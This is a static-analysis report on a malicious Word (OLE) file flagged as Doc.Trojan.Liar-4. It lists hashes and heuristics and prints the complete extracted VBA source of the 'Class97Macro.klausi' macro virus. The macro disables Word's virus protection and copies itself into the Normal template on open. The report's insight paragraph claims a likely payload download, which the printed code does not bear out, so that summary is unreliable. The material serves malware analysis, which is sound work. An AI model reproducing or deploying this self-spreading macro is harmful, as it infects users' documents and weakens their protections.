Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 013a79354776ef63…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-01-31 01:36:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 20e91791cefb65edea579c06109ea160 SHA-1: 16fa7197bb7b02a563e0a5ef94d3cc0a60b74509 SHA-256: 013a79354776ef63de5c9837baa97437f12536cabac932a23a5065be9ffc3f28
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its code and inject it into the document's normal template or active document. The macro's authoring metadata and the ClamAV detection name 'Doc.Trojan.Liar-4' suggest malicious intent, likely to download and execute a secondary payload. The macro's code is heavily obfuscated, making it difficult to determine the exact payload or destination.

Heuristics 3

  • ClamAV: Doc.Trojan.Liar-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Liar-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1739 bytes
SHA-256: fcfc5ac7e449d68101898353a0d05b7f9f042bbc294e602d7f5131f6f4d6ee39
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Name:   Class97Macro.klausi
Rem Author: inspector klausi
Rem Date:   August 1999
--------------------------->


Private Sub DOCUMenT_OPEN() '
Dim v(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set A = MacroContainer.VBProject: Set Ab = A.VBcOmponEnts(1) '
Set ABc = Ab.coDEMoDUle: Set S = NormalTemplate: T = Chr(39) '
If MacroContainer = S Then Set S = ActiveDocument '
Set NH = S.VBProject.VBcOmponEnts(1).coDEMoDUle: Li = ABc.cOUntofliNEs: Y = 100 + Int(Rnd * 50) '
For i = 1 To Li: jc = "": d = Int(Rnd * 3): P = InStr(ABc.LInES(i, 1), T) '
If P = 1 And Li > Y Then '
d = 1: GoTo N_ '
End If '
l = UCase(Left(ABc.LInES(i, 1), (P - 1))) '
For O = 1 To Len(l): F = Mid(l, O, 1) '
If Asc(F) < 90 And Asc(F) > 65 Then F = Chr(Asc(F) + Int(Rnd * 2) * 32) '
v(i) = v(i) & F: Next O '
For J = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next J '
v(i) = v(i) & T & jc '
If d = 2 Then v(i) = v(i) & vbCr & T & jc '
vc = vc & v(i) & vbCr '
N_: '
Next i '
If NH.cOUntofliNEs < (1 + 1 + 2) Then '
NH.dELeTelINES 1, NH.cOUntofliNEs: NH.AdDFrOMSTRiNg vc: NH.dELeTelINES NH.cOUntofliNEs, 1 '
With Dialogs(wdDialogFileSummaryInfo): .Author = "INsPECtor klAUsI": .Title = "INfEcted wItH clAss97MAcRo.kLAuSi": .Execute: End With '
If ActiveDocument.Saved = (Rnd * 0) Then ActiveDocument.SaveAs ActiveDocument.FullName '
End If '
End Sub '
Rem cODed by iNspector kLAUSi '